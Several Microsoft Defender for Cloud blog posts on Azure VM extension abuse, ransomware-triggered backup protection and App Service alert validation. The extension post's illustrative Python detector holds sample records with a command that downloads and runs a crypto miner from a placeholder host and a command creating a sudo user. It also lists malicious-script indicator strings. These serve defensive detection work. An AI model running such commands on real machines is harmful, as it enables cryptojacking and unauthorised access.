alerts
Microsoft Defender for Cloud latest protection against sophisticated abuse of Azure VM Extensions
Introduction

Throughout recent years, the IT world has shifted its workloads, management layers, and machines to the cloud, introducing a new attack surface accompanied by new attack vectors. This shift gave threat actors new tactics for deploying cyber-attacks against organizations' cloud environments: gaining strong permissions, operating for financial gain, and more. Upon compromising an identity with sufficient permissions in Azure, threat actors often try to abuse existing features within the environment that let them deploy their malicious activity stealthily, efficiently, and easily. One feature in particular stands out: Azure VM extensions.

Announcing new detections and alerts against extension abuse

Azure VM extension abuse has never left Microsoft's sight since its first appearance, and a previous publication has discussed the topic. Today, we continue to deliver customer protection as a result of extensive research and monitoring, announcing the new and enhanced protection capabilities against extension abuse that Microsoft Defender for Cloud offers as part of the Microsoft Defender for Servers plan 2 offering, and why they matter. Customers get these protection capabilities effortlessly, without having to manually deploy a dedicated agent on the VM.

Azure virtual machine extensions

Azure virtual machine extensions are small applications that provide post-deployment configuration and automation on Azure VMs, such as software updates, code and script execution, antimalware deployments, and more. VM extensions play an instrumental role in workload management and VM maintenance. Many organizations' cloud environments depend on extension capabilities such as automated configuration deployment, security management, continuous monitoring, troubleshooting, and log analytics.
On the other hand, extensions can be abused as a powerful cloud-native tool by threat actors who have gained an initial foothold in the victim's Azure environment. Gated solely by Azure RBAC permissions, threat actors can abuse VM extensions to execute operations with high privileges and carry out stealthy and destructive cyber-attacks. In this blog, we discuss the various extensions, what makes each unique, the corresponding MITRE ATT&CK techniques associated with them that are abused in the wild and researched in the security community, and introduce Microsoft Defender for Cloud's new series of alerts that combats this abuse.

Threat hunting

Reconnaissance

Network Watcher, Azure Monitor, VMSnapshot extensions

These extensions allow different kinds of data collection and monitoring over network traffic, resource data, diagnostics, analytics, and more.

Network Watcher allows threat actors to capture network traffic, analyze packets, verify IP flow, and diagnose network security groups (NSGs). The Network Watcher tool can be invaluable for advanced threat actors looking to learn the environment topology and identify weaknesses in the victim's cloud environment by:

- Understanding the structure of the environment's security framework.
- Using IP flow verification to check which packets are allowed, in order to find exposed resources.
- Analyzing existing NSGs to determine how to manipulate them to gain access and then persistence.

Azure Monitor allows threat actors to create data collection rules over resources in order to capture various kinds of machine logs and events. Capturing Windows events of different kinds, such as security, system, and application logs, can be highly valuable for threat actors gathering information about the compute running inside the environment. This can be done by creating a dedicated Log Analytics workspace that consumes the logs from the Azure Monitor agent on the VM.

VMSnapshot allows threat actors to capture VM disk snapshots as part of the Azure Backup service.
Through Microsoft's extensive research and investigation of recent sophisticated attacks, evidence has shown that threat actors not only attempt to reset passwords and gain access and persistence to VMs by leveraging the VMAccess extension (discussed later on); they also attempt to capture disk snapshots of VMs that capture their interest during the initial phases, by leveraging Azure Backup service capabilities. Capturing disk snapshots allows threat actors to export critical data from the VM's disks during a short window of time, to a local or remote location, using a dedicated download URL or by copying the disk to another location in the environment. After that, threat actors attempt to attach the disk snapshots to machines they control, after converting them to the right format.

Execution

Azure VM extensions offer a variety of ways to execute code and run scripts as SYSTEM/sudo on your virtual machines, providing threat actors with a powerful tool to deploy their various attack techniques at scale:

(Managed) Run Command

Run Command uses the VM agent to run scripts on the VM as SYSTEM/sudo. It can be abused in a variety of ways, from running recon commands to learn about the victim's cloud environment and creating local admin users for persistence, to downloading payloads onto the machine, executing crypto miners for impact, and more.

Custom Script extension (CSE)

The Custom Script extension allows the user to download and run a script on the VM as SYSTEM/sudo. CSE can be used to deploy different attack vectors at scale, especially when the goal is to run the same script across all the VMs in a virtual machine scale set (unlike Run Command). As an example, Microsoft witnessed the following chain of techniques being abused by a threat actor:

- Password spraying campaign: the threat actor successfully gains initial access to user accounts in Azure.
- Mass compute resource creation: the threat actor sets up the crypto mining environment with the needed network resources.
- Mass deployment of XMRig software on all compute using Custom Script Extensions to initiate the crypto mining campaign.

Azure Desired State Configuration (DSC) extension

The extension uploads and applies a DSC configuration on the VM. Using DSC, threat actors can maliciously deploy scheduled tasks, apply configurations, and execute scripts, resulting in the deployment of a backdoor, a connection to a C2 (Command and Control) server, extraction of the VM's managed identity, and more.

Persistence

Virtual Machine Access extension

The VMAccess extension allows the user to manage administrative users and reset access on Azure VMs. Threat actors often abuse the VMAccess extension to gain access to VMs inside the victim's environment after they gain an initial foothold, by resetting passwords and SSH keys and manipulating the admin users on the VM. As a result, they can pick their target inside the environment and gain access to it using only the cloud-native RBAC roles needed to execute the extension, and go on to discover sensitive information and disrupt critical workloads inside the environment. We can see that the new user can successfully run commands as sudo.

Impact

GPU Driver extension

The extension installs NVIDIA or AMD GPU drivers on supported GPU-equipped VMs so that workloads can take full advantage of the card's capabilities. Threat actors can leverage this capability to deploy a GPU driver on supported Azure VMs in the victim's Azure environment, follow up with the installation of crypto mining software by leveraging the Custom Script Extension or any other technique, and move on to the mining phase.

Disk Encryption extension

Azure Disk Encryption uses BitLocker to provide full disk encryption on Azure virtual machines.
Threat actors can abuse this extension by encrypting the disks of VMs in the victim's cloud environment that capture their interest, with the goal of rendering all data permanently inaccessible by deleting the encryption key or the key vault that contains the key. In such cases, it is crucial for the victim to be aware of purge protection and the other protection measures that Microsoft provides to delay or prevent the deletion of the encryption key.

Detection

After going through the abuse scenarios for the variety of VM extensions, we will dive into Microsoft's new detection capabilities and techniques, and how we defend our customers through continuous monitoring and analysis of suspicious signals, from the control plane to the endpoint.

Microsoft Defender for Cloud is announcing a new series of alerts targeting Azure VM extension abuse, available to customers through Microsoft Defender for Servers plan 2. The new series of detections targets not only a wide range of abuse techniques but also a wide range of extension abuse types, to protect our customers against emerging attack vectors.

Through extensive research, we have been able to single out the suspicious signals for which the likelihood of a breach is high, and by studying user behavior and monitoring for those signals we are able to detect suspicious activity. Some of the signals are the following:

- Usage of VM extensions by a user account that has not used any VM extensions recently.
- A sudden surge in extension usage by a suspicious user account, which might indicate post-breach reconnaissance, impact, or persistence activity.
- Code or script execution containing parts that indicate malicious intent.
- Usage of a combination of extensions within a short time window, which might indicate a reconnaissance attempt.
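As an added example (not Microsoft's detection logic and not code from this post), the Python below implements toy versions of those four signals over constructed Activity Log-style records of extension operations; the caller names, extension names, timestamps and indicator strings are assumptions made for the illustration.

```python
# Toy detection logic for the four extension-abuse signals listed above, run over
# constructed Azure Activity Log-style records. Data and indicator strings are
# constructed for this example; this is not Defender for Cloud's own logic.
from collections import defaultdict
from datetime import datetime, timedelta

# Extensions the post groups under reconnaissance / data collection.
RECON_EXTENSIONS = {"NetworkWatcherAgent", "AzureMonitorAgent", "VMSnapshot"}
# "xmrig" is the miner named in the post; the account-manipulation strings are assumptions.
SCRIPT_INDICATORS = ("xmrig", "net user /add", "usermod -ag sudo")

def rec(caller, time, extension, script=None):
    return {"caller": caller, "time": datetime.fromisoformat(time),
            "extension": extension, "script": script}

OPS, CTR = "ops-admin@contoso.example", "contractor@contoso.example"
RECORDS = [  # constructed sample, not real logs
    rec(OPS, "2024-02-05T09:00:00", "CustomScriptExtension", "apt-get update && apt-get -y upgrade"),
    rec(OPS, "2024-02-19T09:00:00", "CustomScriptExtension", "apt-get update && apt-get -y upgrade"),
    rec(OPS, "2024-03-01T09:00:00", "CustomScriptExtension", "apt-get update && apt-get -y upgrade"),
    # A caller with no extension history chains recon, execution and access changes.
    rec(CTR, "2024-03-01T10:00:00", "NetworkWatcherAgent"),
    rec(CTR, "2024-03-01T10:05:00", "AzureMonitorAgent"),
    rec(CTR, "2024-03-01T10:12:00", "VMSnapshot"),
    rec(CTR, "2024-03-01T10:20:00", "RunCommand", "curl -sL http://example.invalid/xmrig.tgz | tar xz && ./xmrig"),
    rec(CTR, "2024-03-01T10:25:00", "RunCommand", "useradd -m svc-backup && usermod -aG sudo svc-backup"),
    rec(CTR, "2024-03-01T10:40:00", "VMAccessForLinux"),
]
NOW = datetime.fromisoformat("2024-03-01T12:00:00")

def first_time_callers(records, now, baseline_days=30, detect_hours=24):
    """Callers active in the detection window with no extension use in the baseline."""
    detect_start = now - timedelta(hours=detect_hours)
    baseline_start = detect_start - timedelta(days=baseline_days)
    baseline, recent = set(), set()
    for r in records:
        if baseline_start <= r["time"] < detect_start:
            baseline.add(r["caller"])
        elif detect_start <= r["time"] <= now:
            recent.add(r["caller"])
    return sorted(recent - baseline)

def surge_callers(records, window_hours=1, threshold=5):
    """Callers with >= threshold operations inside any sliding window (two pointers)."""
    by_caller = defaultdict(list)
    for r in records:
        by_caller[r["caller"]].append(r["time"])
    window, flagged = timedelta(hours=window_hours), []
    for caller, times in by_caller.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                flagged.append(caller)
                break
    return sorted(flagged)

def suspicious_scripts(records):
    """(caller, extension, indicator) for script bodies containing an indicator string."""
    return [(r["caller"], r["extension"], ind) for r in records if r["script"]
            for ind in SCRIPT_INDICATORS if ind in r["script"].lower()]

def recon_combinations(records, window_minutes=30, min_distinct=2):
    """Callers using >= min_distinct different recon extensions within the window."""
    by_caller = defaultdict(list)
    for r in records:
        if r["extension"] in RECON_EXTENSIONS:
            by_caller[r["caller"]].append((r["time"], r["extension"]))
    window, flagged = timedelta(minutes=window_minutes), {}
    for caller, events in by_caller.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            kinds = {ext for t, ext in events[i:] if t - t0 <= window}
            if len(kinds) >= min_distinct:
                flagged[caller] = sorted(kinds)
                break
    return flagged

if __name__ == "__main__":
    print(first_time_callers(RECORDS, NOW), surge_callers(RECORDS))
    print(suspicious_scripts(RECORDS), recon_combinations(RECORDS))
```

Only the contractor account trips all four signals; the regular weekly Custom Script runs by the ops account stay below every threshold, which is the baseline behaviour the signals are meant to be compared against.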
Mitigation

Identities in Azure require certain highly privileged roles to be able to use extensions; this is yet another example of how identities and permissions form the core of a cloud environment's access controls. As a result, we recommend building a strong framework based on least privilege, granting each identity only the permissions needed to perform its dedicated and legitimate operations, in order to prevent imminent attacks. In addition, continuous monitoring and detection efforts are essential to remediate ongoing attacks and prevent future ones.

Conclusion

With the advent and continued growth of cloud computing in Azure, many threat actors rely on techniques that facilitate the deployment of their malicious activities, and so target Azure VM extensions. As a result of in-depth research and continued monitoring, Microsoft Defender for Cloud is announcing a detection campaign to provide its customers with strong security measures against sophisticated attack vectors and threat actor campaigns targeting extension abuse.

- Learn more about VM extensions: Link
- Learn more about the new series of alerts: Release Notes, Azure VM extensions alerts table
- Learn more about Defender for Cloud plans: Link
- Learn more about Defender for Servers plans: Link

Protect Against OWASP API Top 10 Security Risks Using Defender for APIs
The OWASP API Security Project focuses on strategies and solutions to understand and mitigate the unique vulnerabilities and security risks of APIs. In this post, we'll dive into how Defender for APIs (a plan provided by Microsoft Defender for Cloud) provides security coverage for the OWASP API Top 10 security risks.

Announcing Microsoft Defender for Cloud capabilities to counter identity-based supply chain attacks
In this blog, we will demonstrate the mechanisms of identity-based supply chain attacks in the cloud and discuss how service providers' cloud access can be used by attackers for identity-based supply chain attacks. We will also show how a new alert enrichment in Microsoft Defender for Cloud can help to detect and remediate those threats.

How-to use Microsoft Defender for Cloud Ransomware alerts to preserve Azure Backup recovery points
Credits: This blog post has been co-authored by Chaya Aishwarya. Automation samples developed by Akhil Nampelly, Rajath Ranganath and Vasavi Pasula. Reviewers: Srinath Vasireddy, Anshul Ahuja, Neeraj Jain, Pratik Joshi, Kalyan Karri, Sivasubramanian Narayanan, Yuri Diogenes

Introduction

Ransomware attacks deliberately encrypt or tamper with data to force your organization to pay money to attackers. These attacks can target your data and your backups. The best way to avoid falling victim to ransomware is to implement preventive measures and have tools that protect your organization at every step attackers take to infiltrate your systems. You can leverage Azure native ransomware protection capabilities and implement best practices to ensure your organization is optimally positioned to prevent, protect against, and detect potential ransomware attacks on your Azure assets.

One of the most important steps you can take to protect your data is to have a reliable backup infrastructure. But it is just as important to ensure that your data is backed up securely and that your backups are always protected. Azure Backup provides several security capabilities to help you protect your backup data:

- Soft Delete is enabled by default: even if a malicious actor deletes a backup (or backup data is accidentally deleted), the backup data is retained for 14 additional days, allowing recovery of that backup item with no data loss.
- Immutable vault can help you protect your backup data by blocking any operations that could lead to loss of recovery points.
- You can configure Multi-user authorization (MUA) for Azure Backup as an additional layer of protection for critical operations on your Recovery Services vaults.
Even if security best practices are not followed and notifications are not configured for the Recovery Services vault, critical alerts for destructive operations (such as stop protection with delete backup data) are still raised and an email is sent to subscription owners, admins, and co-admins (learn more).

Microsoft Defender for Cloud is a Cloud Security Posture Management (CSPM) and Cloud Workload Protection Platform (CWPP) for all of your Azure, on-premises, and multicloud (Amazon AWS and Google GCP) resources. Defender for Cloud generates security alerts when threats are identified in your cloud, hybrid, or on-premises environment. It is available when you enable enhanced security features. Each alert provides details of the affected resources along with the information you need to quickly investigate the problem and the steps to take to remediate an attack.

In the event of a malware or ransomware attack on an Azure virtual machine, Microsoft Defender for Cloud detects suspicious activity and indicators associated with ransomware on the VM and generates a security alert. These are the Defender for Cloud alerts that trigger on a ransomware detection:

- Detected Petya ransomware indicators
- Ransomware indicators detected
- Behavior similar to Fairware ransomware detected
- Behavior similar to ransomware detected

Defender for Cloud provides threat intelligence reports containing information about detected threats, which helps incident response teams investigate and remediate them. For more details: Microsoft Defender for Cloud threat intelligence report | Microsoft Learn

Solution details

Assume a virtual machine protected by both Defender for Cloud and Azure Backup is breached. Defender detects the ransomware and raises an alert that includes details of the activity and suggested recommendations to remediate. As soon as a ransomware signal is detected by Defender, ensuring that backups are preserved (i.e., paused from expiring) to minimize data loss is top of mind for our customers.
This sample solution demonstrates integration of Azure Backup with Microsoft Defender for Cloud for detecting and responding to alerts, to accelerate response. The sample illustrates the following three use cases:

1) The ability to send email alerts to the backup admin.
2) A SecOps admin triages the alert and manually triggers the logic app to secure backups.
3) A workflow that automatically responds to the alert by performing the Disable Backup Policy (Stop backup and retain data) operation.

Step-by-step instructions

Prerequisites:

- Enable Azure Backup for Virtual Machines
- Enable Microsoft Defender for Servers Plan 2 for the Subscription

Note: This sample solution is scoped to Azure Virtual Machines. The logic app can only be deployed at a subscription level, which means that all Azure VMs under the subscription can leverage the logic app for pausing expiry of recovery points in the event of a security alert.

Step 1: Deploy the logic app

Note: Owner access on the Subscription is needed to deploy the logic app.

Visit GitHub and click on 'Deploy to Azure' as shown below. Input the following values in the deployment page:

- Subscription: Select the Subscription whose Azure VMs the logic app should govern.
- Name: Input a suitable name for the logic app.
- Region: Choose the region with which the Subscription is associated.
- Email: Input the email address of the Backup admin who should receive alerts when a policy is suspended.
- Resource Group: Logic apps need to be associated with a Resource Group for deployment. Choose any Resource Group.
- Managed Identity: Create and assign a Managed Identity (for guidance on creating a User-defined Managed Identity, visit here) with the below minimum permissions, so that the service can perform the 'Stop backup and retain data' operation on the backup item automatically in the event of a malware alert.
  - Virtual Machine Contributor on the subscription
  - Backup Operator on the subscription
  - Security Reader

Note: To further tighten security, we recommend you create a custom role and assign that to the Managed Identity instead of the built-in roles above. This ensures that all calls run with least privilege. For more details on the custom role, see the GitHub article.

- Managed Identity Subscription: Input the name of the Subscription in which the Managed Identity should reside.
- Managed Identity Resource Group: Input the name of the Resource Group in which the Managed Identity should reside.

Step 2: Authorize Office 365 for email alerts

To authorize the API connection to Office 365:

1. Go to the Resource Group you used to deploy the template resources.
2. Select the Office365 API connection (one of the resources you just deployed) and click on the error that appears on the API connection.
3. Press Edit API connection.
4. Press the Authorize button. Make sure to authenticate against Azure AD.
5. Press Save.

Step 3: Triggering the logic app

The logic app deployed in step 1 can be triggered manually or automatically by leveraging workflow automation.

Triggering manually:

1. Visit Microsoft Defender for Cloud and navigate to Security Alerts in the sidebar.
2. Click on the required alert to expand its details.
3. Click on 'Take action', choose 'Trigger automated response', and click on 'Trigger logic app'.
4. Search for the logic app deployed in step 1 by name and click 'Trigger'.

Note: The minimum RBAC permissions needed for triggering an action for the security alert are the Logic App Operator and Security Admin roles.

Triggering using workflow automation via the Azure portal:

Workflow automation ensures that in the event of a security alert, the backups of the VM facing this issue automatically reach the 'Stop backup and retain data' state, suspending the policy and pausing recovery point pruning. You can also use Azure Policy to deploy workflow automations.
Note: Minimum roles of Logic App Operator and Security Admin are required to deploy the workflow automation.

1. In Defender for Cloud's sidebar, select Workflow automation.
2. Select Add workflow automation. The options pane for your new automation opens.
3. Input the following values:
   - Name and Description: Input a suitable name for the automation.
   - Subscription: Define the scope of the automation; this should be the same as the scope of the logic app.
   - Resource Group: Choose the RG in which the automation will reside.
   - Defender for Cloud Data Type: Security Alert
   - Alert name contains: 'Malware' or 'ransomware'
   - Alert severity: High
   - Logic app: Choose the logic app deployed in step 1

Step 4: Email alerts

Upon disabling the backup policy on the backup item, the logic app also sends an email to the address entered during deployment. The email address should ideally be that of the Backup Admin. The alert can then be investigated, and the backups resumed once the issue is resolved or if it turns out to be a false alarm.

Additional Resources:

- What is Microsoft Defender for Cloud? - Microsoft Defender for Cloud | Microsoft Learn
- Reference table for all security alerts in Microsoft Defender for Cloud | Microsoft Learn
- https://learn.microsoft.com/en-us/azure/backup/backup-azure-immutable-vault-concept
- https://learn.microsoft.com/en-us/azure/backup/backup-azure-immutable-vault-how-to-manage
- https://techcommunity.microsoft.com/t5/azure-storage-blog/how-azure-backup-soft-delete-protects-from...
- https://learn.microsoft.com/en-us/azure/backup/backup-azure-security-feature-cloud
- https://learn.microsoft.com/en-us/azure/backup/backup-azure-enhanced-soft-delete-about
- https://learn.microsoft.com/en-us/azure/backup/multi-user-authorization-concept?tabs=recovery-servic...
- https://learn.microsoft.com/en-us/azure/backup/backup-azure-security-feature-cloud#frequently-asked-...

Validating Microsoft Defender for App Service Alerts
Disclaimer

This document is provided "as is." MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS DOCUMENT. This document does not provide you with any legal rights to any intellectual property in any Microsoft product. You may copy and use this document for your internal, reference purposes.

Introduction

Microsoft Defender for App Service helps organizations be more secure by providing dedicated security analytics for your App Service resources. The purpose of this article is to provide specific guidance on how to validate Microsoft Defender for App Service alerts by simulating suspicious activity on applications running on App Service.

Preparation

The first step in validating Microsoft Defender for App Service alerts is to ensure that Microsoft Defender for App Service is enabled on the subscription(s) you want to use to validate the alert, as shown in Figure 1. Enabling Microsoft Defender for App Service provides monitoring and threat detection for a multitude of threats to your App Service resources. Additionally, enabling it surfaces security findings with recommendations on how to harden the resources covered by the App Service plan. To learn more about Microsoft Defender for App Service, watch this video.

Microsoft Defender for Cloud plans can be enabled individually. For the purpose of validating the scenario covered in this article, the only prerequisite is to enable Microsoft Defender for App Service.

After enabling Microsoft Defender for App Service, you need to determine the scenario that you want to validate. Common scenarios that can be simulated range from PHP uploads, to Nmap scanning, or even Content Management System (CMS) fingerprinting. When determining the scenarios for which you would like to validate alerts, you can also consult the reference guide of alerts for Azure App Service.
Microsoft Defender for App Service alerts are mapped to and cover almost the complete set of MITRE ATT&CK tactics, from pre-attack to command and control, which can be useful when deciding which scenario(s) you wish to simulate. If you only wish to test that the pipeline is working, there is also an App Service alert that can be invoked by making a web request to the "/This_Will_Generate_ASC_Alert" URI. For example, if your site is named 'foo', making a request to https://foo.azurewebsites.net/This_Will_Generate_ASC_Alert will generate an alert similar to the one shown in Figure 2.

In this article, we simulate the scenario of accessing a suspicious PHP page located in the upload folder, which generates the "PHP file in upload folder" alert. This type of folder does not usually contain PHP files, and their presence might indicate exploitation of an arbitrary file upload vulnerability.

Implementing

To simulate this scenario, you can either use an existing Web App or create a new one. When creating a new Web App, you can deploy a PHP app to Azure App Service on Linux (select PHP 7.4 as the runtime stack). The alert that will be generated applies to both App Service on Linux and App Service on Windows. Once you have created the App Service plan and the Web App, install WordPress 5.8 (including creating an Azure Database for MySQL server). To learn more about how to create a PHP Web App in Azure App Service, read this guidance.

Note: In most cases, it might take up to 12 hours for alerts related to a newly created web site to appear.

To simulate the scenario of accessing a suspicious PHP page located in the upload folder, a PHP page is required. You can use the sample below to create a test PHP page (shown in Figure 3) and save it as a PHP file. Afterwards, navigate to "/wp-content/uploads/2021/08/" and upload the file.
Important: After you have uploaded the PHP file to this folder, you need to browse to this PHP page using a browser (similarly to Figure 5). Note that the output on the page depends on the code in your test PHP file.

Validating

Once Microsoft Defender for App Service generates the alert on the target subscription(s), you can find it in the "Security alerts" section of the Microsoft Defender for Cloud dashboard. Selecting the generated alert (in this case "PHP file in upload folder") opens a blade that provides more context and rich metadata about the alert (similar to Figure 6). When validating the alerts, be sure to consult the full list of App Service alerts.

You can also export Microsoft Defender for Cloud alerts to a SIEM (e.g. Azure Sentinel or a third-party SIEM). Learn more about how to stream alerts to a SIEM, SOAR or ITSM. Learn more about how to investigate Microsoft Defender for Cloud alerts using Azure Sentinel. Learn more about Analysing Web Shell Attacks with Microsoft Defender for Cloud data in Azure Sentinel - Microsoft Tech Community.

Final Considerations

Microsoft Defender for App Service is all about providing threat detection and security recommendations for applications running on App Service. This article focused on validating alerts for Microsoft Defender for App Service by simulating a specific scenario, namely accessing a suspicious PHP page located in the upload folder. Properly executing the steps outlined in this article generates the security alert "PHP file in upload folder". This article is not intended to cover all scenarios, but it provides real value as you get started with validating Microsoft Defender for App Service alerts. Keep an eye out for other articles from this series, which can be found on our official ASC Tech Community.
Reviewers: @Yuri Diogenes, Principal PM; @Tomer Spivak, Senior PM
Contributors: Dotan Patrich, Principal Software Engineer; Yossi Weizman, Senior Security Researcher; Ram Pliskin, Senior Security Researcher Manager; Lior Arviv, Senior PM

Uncover the latest cloud data security capabilities from Microsoft Defender for Cloud
Learn about the latest multicloud data security capabilities from Microsoft Defender for Cloud to strengthen your data security posture and protect your cloud data estate against data breaches and malware distribution.